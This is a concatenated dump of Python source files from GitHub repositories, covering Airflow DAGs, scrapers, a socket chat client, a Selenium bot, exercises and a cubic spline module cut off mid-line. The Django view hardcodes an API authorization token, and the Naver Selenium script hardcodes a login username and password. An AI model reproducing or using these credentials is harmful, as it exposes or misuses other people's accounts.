DummyOperator(\n task_id='finish_send_long_term',\n trigger_rule='one_success',\n dag=dag)\nfinish_send = DummyOperator(\n task_id='finish_send',\n trigger_rule='none_failed',\n dag=dag)\nend_job = DummyOperator(\n task_id='work_done',\n trigger_rule='one_success',\n dag=dag)\n\nfor yesorno in is_tri:\n t = DummyOperator(\n task_id=yesorno,\n dag=dag\n )\n if yesorno == 'yes':\n is_tri_week >> t >> send_message_longterm >> finish_send_long_term\n else:\n is_tri_week >> t >> finish_send_long_term\n\nfor option in options:\n t = DummyOperator(\n task_id=option,\n dag=dag\n )\n if option == 'upload':\n is_oclock >> t >> [is_tri_week, send_message_daily]\n else:\n is_oclock >> t >> end_job\n\nsuspend = SnowflakeOperator(\n task_id='suspend',\n snowflake_conn_id='snowflake_chequer',\n sql=\"\"\"alter warehouse airflow_warehouse suspend\"\"\",\n autocommit=True,\n trigger_rule='none_failed',\n dag=dag\n)\nfinish = DummyOperator(\n task_id='finish',\n trigger_rule='none_skipped',\n dag=dag)\n\n[finish_send_long_term, send_message_daily] >> finish_send >> end_job\nend_job >> suspend >> finish\n","repo_name":"roganOh/portfolio","sub_path":"chequer/chequerETL/run_dags/teams_webhook_country.py","file_name":"teams_webhook_country.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"16423598977","text":"# https://inf-ege.sdamgia.ru/problem?id=35482\n\"\"\" найти строку, содержащую наименьшее количество букв G если \nтаких строк неск, надо взять ту, которая находится в файле раньше, \nи определить, какая буква встречается в этой строке чаще всего. \nЕсли таких букв неск, надо взять ту, котор позже стоит в алфав\"\"\"\n\nf = open(\"24_35482.txt\")\nmin_s, min_g = \"\", 999999999\nfor s in f:\n if s.count(\"G\") < min_g:\n min_g = s.count(\"G\")\n min_s = s\nf.close()\n\nalp = [chr(65+i) for i in range(26)][::-1]\nmx_smb, cnt = \" \", 0\nfor smb in alp:\n if min_s.count(smb) > cnt:\n cnt = min_s.count(smb)\n mx_smb = smb\nprint(cnt, mx_smb)\n","repo_name":"permCoding/ege-21-22","sub_path":"tasks/task24/24_35482.py","file_name":"24_35482.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25656128212","text":"import logging\n\nimport requests\nfrom django.http.response import JsonResponse\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom master_sniffer.serializers import TrackingEventSerializer\nfrom master_sniffer.models import TrackingEvent\nfrom master_sniffer.apps import WEB_SERVER_URL\nfrom Pawfiguration import REQUEST_QUEUE\nfrom requests import Request\nfrom datetime import timedelta\n\n@api_view(['GET', 'PUT'])\ndef list_events(request):\n\n if request.method == 'GET':\n return JsonResponse(data={\"status\": status.HTTP_501_NOT_IMPLEMENTED},status=status.HTTP_501_NOT_IMPLEMENTED)\n\n elif request.method == 'PUT':\n logging.info('Received tracking event!!')\n serializer = TrackingEventSerializer(data=request.data)\n if serializer.is_valid():\n\n #sniffer_query = Device.objects.filter(serial_num = event.sniffer_serial, active=True)\n\n # Make sure we don't receive repeat request\n '''\n prev_event = TrackingEvent.objects\\\n .filter(beacon_addr=serializer.validated_data['beacon_addr'])\\\n .order_by('event_time')[0]\n '''\n event = serializer.create(serializer.validated_data)\n logging.info('Tracking event from %s created! Beacon MAC %s detected.', event.sniffer_serial,\n event.beacon_addr)\n event.save()\n req = requests.request(\n method='POST',\n url='https://pawpharos.com/api/events/',\n json={\n 'sniffer_serial': event.sniffer_serial,\n 'beacon_addr': event.beacon_addr,\n 'event_time': event.event_time.isoformat(),\n 'rssi': event.rssi\n },\n headers={\n 'Authorization': 'Token 393be039779f7799ea090b6d5006ed5980b3c7e5',\n 'Host': 'pawpharos.com'\n }\n )\n logging.info('Request sent to server with response code %d.', req.status_code)\n # Then queue this event to get pushed to the webserver\n # REQUEST_QUEUE.put_nowait(req)\n return JsonResponse(serializer.data, content_type='application/json', status=status.HTTP_201_CREATED)\n '''\n if all([prev_event.sniffer_serial == serializer.validated_data['sniffer_serial'],\n (serializer.validated_data['event_time'] - prev_event.event_time) < timedelta(minutes=5)]):\n \n else:\n logging.info('Duplicate event detected, ignoring!')\n return JsonResponse(serializer.data, status=status.HTTP_208_ALREADY_REPORTED)\n '''\n\n return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)","repo_name":"PKmnman/SnifferConfig","sub_path":"master_sniffer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43173523874","text":"#!/usr/bin/env python\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\nparser.add_argument(\"days\", nargs=\"+\", type=int)\nargs = parser.parse_args()\n\nfrom pathlib import Path\nfrom subprocess import run\n\n\ndef main(args):\n for day in args.days:\n file = Path(f\"py/{day}.py\")\n if file.exists():\n print(f\"Advent of Code, Day {day:02d}\")\n run([\"python\", file])\n print(f\"----------------------\")\n\n\nif __name__ == \"__main__\":\n main(args)\n","repo_name":"nbiederbeck/adventofcode2022","sub_path":"aoc.py","file_name":"aoc.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7991358119","text":"while True:\n try:\n h, m = input().split()\n\n hours = int(h) / 30\n minutes = int(m) / 6\n\n hours, minutes = str(int(hours)), str(int(minutes))\n\n print(f'{hours.zfill(2)}:{minutes.zfill(2)}')\n \n except EOFError:\n break","repo_name":"gustavonikov/URI_problems","sub_path":"URI 3084 - Old clock.py","file_name":"URI 3084 - Old clock.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23719298620","text":"from gocept.amqprun.writefiles import FileWriter\nimport Queue\nimport gocept.amqparchive.interfaces\nimport gocept.amqparchive.xml\nimport logging\nimport multiprocessing\nimport optparse\nimport os.path\nimport pyes\nimport time\nimport zope.component\nimport zope.xmlpickle\n\n\nlog = logging.getLogger(__name__)\n\n\ndef reindex_file(path, base):\n log.info(path)\n\n if not base.endswith('/'):\n base += '/'\n body = open(path, 'r').read()\n data = dict(\n path=path.replace(base, ''),\n data=gocept.amqparchive.xml.jsonify(body),\n )\n directory = os.path.dirname(path)\n filename = os.path.basename(path)\n header_file = os.path.join(directory, FileWriter.header_filename(filename))\n header = zope.xmlpickle.loads(open(header_file).read())\n data.update(header.__dict__)\n\n elastic = zope.component.getUtility(\n gocept.amqparchive.interfaces.IElasticSearch)\n elastic.index(data, 'queue', 'message')\n\n\ndef collect_message_files(path):\n for (dirpath, dirnames, filenames) in os.walk(path):\n for f in filenames:\n if f.startswith('.'):\n # skip hidden files\n continue\n f = os.path.join(dirpath, f)\n if not FileWriter.is_header_file(f):\n yield f\n for d in dirnames:\n collect_message_files(os.path.join(dirpath, d))\n\n\ndef reindex_directory(path, base):\n if base is None:\n base = path\n files = collect_message_files(path)\n for f in files:\n try:\n reindex_file(f, base)\n except Exception:\n log.error('Error reindexing %s', f, exc_info=True)\n\n\ndef reindex_directory_parallel(path, base, jobs):\n if base is None:\n base = path\n queue = multiprocessing.JoinableQueue()\n done = multiprocessing.Event()\n collect = multiprocessing.Process(\n target=worker_collect_files, args=(queue, path))\n collect.start()\n\n workers = []\n for i in range(jobs):\n job = multiprocessing.Process(\n target=worker_reindex_file, args=(queue, done, base))\n job.start()\n workers.append(job)\n\n collect.join()\n done.set()\n queue.join()\n\n\ndef worker_collect_files(queue, path):\n files = collect_message_files(path)\n for f in files:\n queue.put(f)\n\n\ndef worker_reindex_file(queue, done, base):\n while True:\n try:\n f = queue.get(False)\n except Queue.Empty:\n if done.is_set():\n break\n else:\n log.debug('Waiting 1s for more work')\n time.sleep(1)\n continue\n\n try:\n reindex_file(f, base)\n except Exception:\n log.error('Error reindexing %s', f, exc_info=True)\n queue.task_done()\n\n\ndef delete_index(name):\n elastic = zope.component.getUtility(\n gocept.amqparchive.interfaces.IElasticSearch)\n elastic.delete_index(name)\n\n\ndef main(argv=None):\n o = optparse.OptionParser(\n prog='reindex_directory',\n description='Read archived message files into elasticsearch index',\n usage='%prog [-d] [-jX] -h host:port directory')\n o.add_option(\n '-d', '--delete', action='store_true',\n help='delete index first')\n o.add_option(\n '-c', '--connection',\n help='hostname and port of the elasticsearch server')\n o.add_option(\n '-j', '--jobs', default='1',\n help='amount of worker processes')\n o.add_option(\n '-b', '--basedir', default=None,\n help='index filenames relative to this directory')\n\n options, arguments = o.parse_args(argv)\n if len(arguments) != 1:\n o.error('must specify a directory')\n\n if not options.connection:\n o.error('elasticsearch server name is required')\n\n logging.basicConfig(\n level=logging.ERROR,\n format='%(asctime)s [%(levelname)s] %(message)s')\n log.setLevel(logging.INFO)\n\n es = pyes.ES(options.connection)\n zope.component.provideUtility(\n es, gocept.amqparchive.interfaces.IElasticSearch)\n\n if options.delete:\n log.info('deleting index \"queue\"')\n delete_index('queue')\n\n jobs = int(options.jobs)\n if jobs == 1:\n reindex_directory(arguments[0], options.basedir)\n else:\n reindex_directory_parallel(arguments[0], jobs, options.basedir)\n","repo_name":"gocept/gocept.amqparchive","sub_path":"src/gocept/amqparchive/reindex.py","file_name":"reindex.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71538157159","text":"#https://github.com/samuhay/Python-Chat-App/tree/master\r\nfrom socket import AF_INET, socket, SOCK_STREAM\r\nfrom threading import Thread\r\nimport tkinter\r\nimport tkinter as tk\r\nfrom winsound import *\r\n\r\n#Mac Kullanıyorsanız python üzerinden pygame kullanmanız tercih edilir\r\n\"\"\"\r\nsudo pip install pygame (Terminal ile yükleyin)\r\nimport pygame\r\npygame.init()\r\npygame.mixer.init()\r\nsounda= pygame.mixer.Sound(\"A-Computer Error.wav\")\r\nsounda.play()\r\n\"\"\"\r\n\r\ndef receive():\r\n \"\"\"Gelen mesajlarla ilgili foksiyon.\"\"\"\r\n counter=0\r\n while True:\r\n try:\r\n counter+=1\r\n msg = client_socket.recv(BUFSIZ).decode(\"utf8\")\r\n msg_list.insert(tkinter.END, msg)\r\n if counter > 3:\r\n song_id = msg.split(\":\")[1]\r\n if song_id ==\" {ses1}\":\r\n PlaySound(\"A-Computer Error\", SND_FILENAME)\r\n if song_id ==\" {ses2}\":\r\n PlaySound(\"a-ice-cubes-glass-daniel_simon\", SND_FILENAME)\r\n if song_id ==\" {ses3}\":\r\n PlaySound(\"Air Plane Ding-Sound\", SND_FILENAME)\r\n if song_id ==\" {ses4}\":\r\n PlaySound(\"a-service-bell_daniel_simion\", SND_FILENAME)\r\n if song_id ==\" {ses5}\":\r\n PlaySound(\"A-Tone-His_Self\", SND_FILENAME)\r\n except OSError: # Kullanıcının sohbeti terk etme durumu.\r\n break\r\n\r\ndef send(event=None): # Event binder ile gönderme işlemi.\r\n \"\"\"Mesaj gönderme kısımı.\"\"\"\r\n msg = my_msg.get()\r\n my_msg.set(\"\") # Mesaj gönderdikten sonra inputu temizleme.\r\n client_socket.send(bytes(msg, \"utf8\"))\r\n if msg == \"{quit}\":#çıkış komutu sohbetten ayrılma bağlantı kesme\r\n client_socket.close()\r\n top.quit()\r\n\r\ndef play(id):\r\n if id == 1:\r\n tag = \"{ses1}\"\r\n client_socket.send(bytes(tag,\"utf8\"))\r\n return PlaySound(\"A-Computer Error\", SND_FILENAME)\r\n if id == 2:\r\n tag = \"{ses2}\"\r\n client_socket.send(bytes(tag, \"utf8\"))\r\n return PlaySound(\"a-ice-cubes-glass-daniel_simon\", SND_FILENAME)\r\n if id == 3:\r\n tag = \"{ses3}\"\r\n client_socket.send(bytes(tag, \"utf8\"))\r\n return PlaySound(\"Air Plane Ding-Sound\", SND_FILENAME)\r\n if id == 4:\r\n tag = \"{ses4}\"\r\n client_socket.send(bytes(tag, \"utf8\"))\r\n return PlaySound(\"a-service-bell_daniel_simion\", SND_FILENAME)\r\n if id == 5:\r\n tag = \"{ses5}\"\r\n client_socket.send(bytes(tag, \"utf8\"))\r\n return PlaySound(\"A-Tone-His_Self\", SND_FILENAME)\r\n\r\ndef on_closing(event=None):\r\n \"\"\"Sohbet ekranı kapanırken çalışır.\"\"\"\r\n my_msg.set(\"{quit}\")\r\n send()\r\n\r\ndef create_window():\r\n \"\"\"Ses butonunu ekrana eklemek için gerekli kısım\"\"\"\r\n window = tk.Toplevel(top)\r\n window.title('Sound')\r\n window.geometry('300x50')\r\n sound1 = tk.Button(window,text=\"1\", command=lambda: play(1)).pack(side=tk.LEFT)\r\n sound2 = tk.Button(window, text=\"2\", command=lambda: play(2)).pack(side=tk.LEFT)\r\n sound3 = tk.Button(window, text=\"3\", command=lambda: play(3)).pack(side=tk.LEFT)\r\n sound4 = tk.Button(window, text=\"4\", command=lambda: play(4)).pack(side=tk.LEFT)\r\n sound5 = tk.Button(window, text=\"5\", command=lambda: play(5)).pack(side=tk.LEFT)\r\n\r\ntop = tkinter.Tk()\r\ntop.geometry(\"340x500\")\r\ntop.title(\"CS 364 APP\")\r\n\r\nmessages_frame = tkinter.Frame(top)\r\n\r\nscrollbar = tkinter.Scrollbar(messages_frame) # Mesaj kutusu içinde gezinme için scrollbar.\r\n# Mesaj kutusu ayarları.\r\nmsg_list = tkinter.Listbox(messages_frame, height=28, width=51, yscrollcommand=scrollbar.set)\r\nscrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)\r\nmsg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\r\nmsg_list.pack()\r\nmessages_frame.pack()\r\n\r\nmy_msg = tkinter.StringVar()# Gönderilecek mesaj kısımı\r\nmy_msg.set(\"Adınız:\")\r\n\r\nentry_field = tkinter.Entry(top, textvariable=my_msg, width=50) #Mesaj butonu\r\nentry_field.bind(\"\", send)\r\nentry_field.pack()\r\nsend_button = tkinter.Button(top, text=\"Gönder\", command=send)\r\nsend_button.pack(side=tk.LEFT)\r\n\r\n\r\n#sound\r\nsound_button=tk.Button(top,text='Sound',command=create_window)\r\nsound_button.pack(in_=top, side=tk.LEFT)\r\n\r\n\r\ntop.protocol(\"WM_DELETE_WINDOW\", on_closing)\r\n\r\n#----Now comes the sockets part----\r\nHOST = input('HOST: ')\r\nPORT = input('PORT: ')\r\nif not PORT: #Port belirtilmezse sabit port\r\n PORT = 1234\r\nelse:\r\n PORT = int(PORT)\r\n\r\nBUFSIZ = 1024\r\nADDR = (HOST, PORT)\r\n\r\nclient_socket = socket(AF_INET, SOCK_STREAM)\r\nclient_socket.connect(ADDR)\r\n\r\nreceive_thread = Thread(target=receive)\r\nreceive_thread.start()\r\ntkinter.mainloop()\r\n","repo_name":"caferyukseloglu/Python-Chat-App","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27500018220","text":"# Import Splinter, BeautifulSoup, and Pandas\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup as soup\nimport pandas as pd\nimport datetime as dt\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n\ndef scrape_all():\n # Initiate headless driver for deployment\n executable_path = {'executable_path': ChromeDriverManager().install()}\n browser = Browser('chrome', **executable_path, headless=True)\n\n news_title, news_paragraph = mars_news(browser)\n\n img_dic = img_scrape(browser)\n\n # Run all scraping functions and store results in a dictionary\n data = {\n \"news_title\": news_title,\n \"news_paragraph\": news_paragraph,\n \"featured_image\": featured_image(browser),\n \"facts\": mars_facts(),\n \"last_modified\": dt.datetime.now(),\n \"img_list\": img_dic\n }\n\n # Stop webdriver and return data\n browser.quit()\n return data\n\n\ndef mars_news(browser):\n\n # Scrape Mars News\n # Visit the mars nasa news site\n url = 'https://data-class-mars.s3.amazonaws.com/Mars/index.html'\n browser.visit(url)\n\n # Optional delay for loading the page\n browser.is_element_present_by_css('div.list_text', wait_time=10)\n\n # Convert the browser html to a soup object and then quit the browser\n html = browser.html\n news_soup = soup(html, 'html.parser')\n\n # Add try/except for error handling\n try:\n slide_elem = news_soup.select_one('div.list_text')\n # Use the parent element to find the first 'a' tag and save it as 'news_title'\n news_title = slide_elem.find('div', class_='content_title').get_text()\n # Use the parent element to find the paragraph text\n news_p = slide_elem.find('div', class_='article_teaser_body').get_text()\n\n except AttributeError:\n print(\"Error in Mars_News Collection\")\n return None, None\n\n return news_title, news_p\n\n\ndef featured_image(browser):\n # Visit URL\n url = 'https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/index.html'\n browser.visit(url)\n\n # Optional delay for loading the page\n browser.is_element_present_by_css('button', wait_time=10)\n\n # Find and click the full image button\n full_image_elem = browser.find_by_tag('button')[1]\n full_image_elem.click()\n\n # Parse the resulting html with soup\n html = browser.html\n img_soup = soup(html, 'html.parser')\n\n # Add try/except for error handling\n try:\n # Find the relative image url\n img_url_rel = img_soup.find('img', class_='headerimage fade-in').get('src')\n\n except AttributeError as e:\n print(f\"Error in Featured_Image Collection \\n\\n {e}\")\n return None\n\n # Use the base url to create an absolute url\n img_url = f'https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/{img_url_rel}'\n\n return img_url\n\ndef mars_facts():\n # Add try/except for error handling\n try:\n # Use 'read_html' to scrape the facts table into a dataframe\n df = pd.read_html('https://data-class-mars-facts.s3.amazonaws.com/Mars_Facts/index.html')[0]\n\n except BaseException as e:\n print(f\"----Error in Mars_Facts Collection ---- \\n\\n{e}\")\n return None\n\n # Assign columns and set index of dataframe\n df.columns=['Description', 'Mars', 'Earth']\n df.set_index('Description', inplace=True)\n\n # Convert dataframe into HTML format, add bootstrap\n return df.to_html()\n\ndef img_scrape(browser):\n # 1. Use browser to visit the URL \n url = 'https://marshemispheres.com/'\n browser.visit(url)\n\n # 2. Create a list to hold the images and titles.\n hemisphere_image_urls = []\n\n # 3. Write code to retrieve the image urls and titles for each hemisphere.\n # Loop once for each hemisphere\n for x in range(4):\n \n # Find the click on the Image Link\n imgs = browser.find_by_css(\"img.thumb\", wait_time=3)[x]\n imgs.click()\n \n # Parse browser HTML and drill down to find the HREF of the \"Sample\" link\n html = browser.html\n img_soup = soup(html, 'html.parser')\n img_url_rel = img_soup.find(\"div\", class_=\"downloads\").ul.li.a.get('href')\n \n # Store the URL for the high-def picture\n img_url = f'https://marshemispheres.com/{img_url_rel}'\n \n # Find and store the Title for the picture\n img_title = img_soup.find(\"div\", class_=\"cover\").h2.text\n\n # Append the URL and Title to our hemisphere_image_urls list\n hemisphere_image_urls.append(\n {\n 'img_url': img_url,\n 'title': img_title\n }\n )\n \n # Visit the original site for further processing\n browser.visit(url)\n\n # Return the hemisphere images list\n return hemisphere_image_urls\n\nif __name__ == \"__main__\":\n\n # If running as script, print scraped data\n print(scrape_all())","repo_name":"Jamesrx33/Mission-to-Mars","sub_path":"Module Files/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3463972526","text":"from point import *\r\nfrom random import randint\r\nfrom rectangle import *\r\n\r\nrectanglex = Rectangle(Point(randint(0,9),randint(0,9)),Point(randint(0,9),randint(0,9)))\r\nprint(\"The rectangle coordinates are: ({},{}),({},{})\".format(rectanglex.lowleft.x,rectanglex.lowleft.y,rectanglex.upright.x,rectanglex.upright.y))\r\nrectanglex.length_of_rectangle()\r\nrectanglex.area_of_the_rectangle()\r\nx,y = input(\"Please provide a point x and y: \").split()\r\npoint = Point(int(x),int(y))\r\nif point.falls_in_rectangle(rectanglex):\r\n print(\"The point:({},{}) is inside the rectangle\".format(point.x,point.y))\r\nelse:\r\n print(\"The point:({},{}) is outside the rectangle\".format(point.x,point.y))\r\n\r\n\r\n","repo_name":"manasakorukonda/All-Projects","sub_path":"python/geometry Project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3466692116","text":"import sys\nimport io\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver.chrome.options import Options\n\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = \"utf-8\")\n\nclass ncafewrite:\n def __init__(self):\n chrome_options = Options()\n chrome_options.add_argument('--headless')\n self.driver = webdriver.Chrome(chrome_options=chrome_options,executable_path=\"C:/Users/moon2/Desktop/file/py/s3/webdriver/chromedriver\")\n\n\n def writeattendcheck(self):\n self.driver.get('https://nid.naver.com/nidlogin.login?mode=form&url=https%3A%2F%2Fwww.naver.com')\n self.driver.find_element_by_name('id').send_keys('moon20517')\n self.driver.find_element_by_name('pw').send_keys('Ansc112!')\n self.driver.find_element_by_xpath('//*[@id=\"frmNIDLogin\"]/fieldset/input').click()\n self.driver.implicitly_wait(30)\n self.driver.get('https://cafe.naver.com/AttendanceView.nhn?search.clubid=10121064&search.menuid=494')\n self.driver.implicitly_wait(30)\n self.driver.switch_to_frame('cafe_main')\n self.driver.find_element_by_id('cmtinput').send_keys('hi')\n self.driver.find_element_by_xpath('//*[@id=\"btn-submit-attendance\"]').click()\n time.sleep(3)\n def __del__(self):\n self.driver.quit()\n\n\nif __name__ == '__main__':\n a =ncafewrite()\n start_time = time.time()\n a.writeattendcheck()\n del a\n","repo_name":"CAHNGKI/py","sub_path":"s3/3-10.py","file_name":"3-10.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17092956979","text":"from PyQt4 import QtCore, QtGui\n\ndef gui_fname(dir=None, index=0):\n \"\"\"Select a file via a dialog and returns the file name.\n \"\"\"\n if dir is None: dir ='./'\n message = \"Select Folder #%d\" %index\n dir_name = QtGui.QFileDialog.getExistingDirectory(None, message,\n dir,\n QtGui.QFileDialog.ShowDirsOnly)\n return dir_name\n\n\ndef gui_output_folder(dir=None):\n \"\"\"Select a folder\n \"\"\"\n if dir is None: dir ='./'\n dir_name = QtGui.QFileDialog.getExistingDirectory(None, \"Select Folder ...\",\n dir,\n QtGui.QFileDialog.ShowDirsOnly)\n return dir_name\n","repo_name":"JeanBilheux/python_101","sub_path":"users_notebooks/combine/widgets_handler.py","file_name":"widgets_handler.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"25271633060","text":"import plistlib\n\n\ndef write(nksf, filename):\n vendors = {\n 'Arturia': ('Artu', 'Controller State'), # 1098019957\n 'Waldorf': ('3E00', 'Processor State'), # 860172336\n }\n manufacturer, field = vendors[nksf['NISI']['vendor']]\n plist = {\n field: nksf['PCHK'],\n 'manufacturer': int(manufacturer.encode('ascii').hex(), base=16),\n 'subtype': nksf['PLID']['VST.magic'],\n 'type': int(b'aumu'.hex(), base=16), # 1635085685\n 'version': 0,\n 'name': nksf['NISI']['name'],\n }\n with open(filename, 'wb') as f:\n plistlib.dump(plist, f, fmt=plistlib.FMT_XML)\n","repo_name":"mkuron/aupreset-generator","sub_path":"aupreset_generator/aupreset.py","file_name":"aupreset.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7765279841","text":"#9am-5pm\n#water - water.mp3 (3.5 li) - drag -log\n#eyes - eyes.mp3 - every 30 mins - eydone\n#yoga - yoga.mp3 - 45mins - exdone\n\nfrom time import time\nfrom pygame import mixer\nimport datetime\n\ndef sound(filename,put):\n mixer.init()\n mixer.music.load(filename)\n mixer.music.play()\n while True:\n s = input(\"Please give input = \")\n if s==put:\n mixer.music.stop()\n break\n\ndef file_c(m):\n with open(\"log.txt\",\"a\") as f:\n s = f.write(f\"{datetime.now()} : {m}\\n\")\n print(s)\n \n\n\nif __name__==\"__main__\":\n water_t=time()\n eyes_t=time()\n yoga_t=time()\n wd=5\n ed=10\n yd=15\n while True:\n if time() - water_t > wd:\n sound(\"water.mp3\",\"stop\")\n file_c(\"drink water\")\n if time() - eyes_t > ed:\n sound(\"eyes.mp3\",\"stop\")\n file_c(\"cool eyes\")\n if time() -yoga_t > yd:\n sound(\"yoga.mp3\",\"stop\")\n file_c(\"go to yoga\")\n break\n\n\n\n\n\n\n","repo_name":"sandipchatterjee540/python-project","sub_path":"healthy_programer/healthy_programer.py","file_name":"healthy_programer.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11517582356","text":"def subsets_iterative(nums):\n \"\"\"\n Iteratively update\n Time: O(n * 2^n)\n Space: O(1) res not included\n \"\"\"\n res = [[]]\n for num in nums:\n # for every new number, create a copy of the current res,\n # and append num to every list in the copy\n res += [curr + [num] for curr in res]\n return res\n\n\ndef subsets(nums):\n \"\"\"\n Backtracking\n Time: O(n * 2^n) 2^n, number of subsets of nums (each element can either be in or out of a subset)\n n, the time to copy the solution to res\n Space: O(n) the recursion stack and curr_res (res not included)\n \"\"\"\n res = []\n\n def backtrack(start, curr_res):\n # unlike combination, where we append only when we are at the bottom layer\n # for subsets we append each node in the recursion tree (we can guarantee there are no repetitions)\n # make a copy of curr_res since we will pop its last element upon return to the previous layer\n res.append(curr_res[:])\n for i in range(start, len(nums)):\n curr_res.append(nums[i])\n # this search guarantees we won't have any repetition\n backtrack(i + 1, curr_res)\n # pop out so that the next element can join (same level)\n curr_res.pop()\n\n backtrack(0, [])\n return res\n\n\ntest = [1, 2, 4]\nprint(subsets_iterative(test))\n","repo_name":"filozyu/leetcode-journey","sub_path":"src/backtracking/subsets.py","file_name":"subsets.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22970709274","text":"#!/usr/bin/env python\n\nimport rospy\nimport tf\nimport numpy as np\nimport rospkg\nimport math\nimport time\nfrom ackermann_msgs.msg import AckermannDriveStamped\nfrom sensor_msgs.msg import Imu\nfrom geometry_msgs.msg import Point\nfrom geometry_msgs.msg import PoseStamped\nfrom nav_msgs.msg import Path\nfrom nav_msgs.msg import Odometry\nfrom std_msgs.msg import Float32, UInt32, Bool\nfrom std_msgs.msg import Int32MultiArray\nfrom sensor_msgs.msg import NavSatFix\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler\nfrom gps_common import *\nimport copy\nfrom math import *\n\n\nimport matplotlib.pyplot as plt\nimport sys\n\nimport bisect\n\nsys.path.append(\"/home/mds/catkin_ws/src/autonomous-vehicle-MDS/stauto_control/src\")\n\nclass Spline:\n\n\n def __init__(self, x, y):\n self.b, self.c, self.d, self.w = [], [], [], []\n\n self.x = x\n self.y = y\n\n self.nx = len(x) # dimension of x\n h = np.diff(x)\n\n # calc coefficient c\n self.a = [iy for iy in y]\n\n # calc coefficient c\n A = self.__calc_A(h)\n B = self.__calc_B(h)\n self.c = np.linalg.solve(A, B)\n # print(self.c1)\n\n # calc spline coefficient b and d\n for i in range(self.nx - 1):\n self.d.append((self.c[i + 1] - self.c[i]) / (3.0 * h[i]))\n tb = (self.a[i + 1] - self.a[i]) / h[i] - h[i] * \\\n (self.c[i + 1] + 2.0 * self.c[i]) / 3.0\n self.b.append(tb)\n\n def calc(self, t):\n\n\n if t < self.x[0]:\n return None\n elif t > self.x[-1]:\n return None\n\n i = self.__search_index(t)\n dx = t - self.x[i]\n result = self.a[i] + self.b[i] * dx + \\\n self.c[i] * dx ** 2.0 + self.d[i] * dx ** 3.0\n\n return result\n\n def calcd(self, t):\n\n\n if t < self.x[0]:\n return None\n elif t > self.x[-1]:\n return None\n\n i = self.__search_index(t)\n dx = t - self.x[i]\n result = self.b[i] + 2.0 * self.c[i] * dx + 3.0 * self.d[i] * dx ** 2.0\n return result\n\n def calcdd(self, t):\n\n\n if t < self.x[0]:\n return None\n elif t > self.x[-1]:\n return None\n\n i = self.__search_index(t)\n dx = t - self.x[i]\n result = 2.0 * self.c[i] + 6.0 * self.d[i] * dx\n return result\n\n def __search_index(self, x):\n\n return bisect.bisect(self.x, x) - 1\n\n def __calc_A(self, h):\n\n A = np.zeros((self.nx, self.nx))\n A[0, 0] = 1.0\n for i in range(self.nx - 1):\n if i != (self.nx - 2):\n A[i + 1, i + 1] = 2.0 * (h[i] + h[i + 1])\n A[i + 1, i] = h[i]\n A[i, i + 1] = h[i]\n\n A[0, 1] = 0.0\n A[self.nx - 1, self.nx - 2] = 0.0\n A[self.nx - 1, self.nx - 1] = 1.0\n # print(A)\n return A\n\n def __calc_B(self, h):\n\n B = np.zeros(self.nx)\n for i in range(self.nx - 2):\n B[i + 1] = 3.0 * (self.a[i + 2] - self.a[i + 1]) / \\\n h[i + 1] - 3.0 * (self.a[i + 1] - self.a[i]) / h[i]\n return B\n\n\nclass Spline2D:\n\n\n def __init__(self, x, y):\n self.s = self.__calc_s(x, y)\n self.sx = Spline(self.s, x)\n self.sy = Spline(self.s, y)\n\n def __calc_s(self, x, y):\n dx = np.diff(x)\n dy = np.diff(y)\n self.ds = np.hypot(dx, dy)\n s = [0]\n s.extend(np.cumsum(self.ds))\n return s\n\n def calc_position(self, s):\n\n x = self.sx.calc(s)\n y = self.sy.calc(s)\n\n return x, y\n\n def calc_curvature(self, s):\n\n dx = self.sx.calcd(s)\n ddx = self.sx.calcdd(s)\n dy = self.sy.calcd(s)\n ddy = self.sy.calcdd(s)\n k = (ddy * dx - ddx 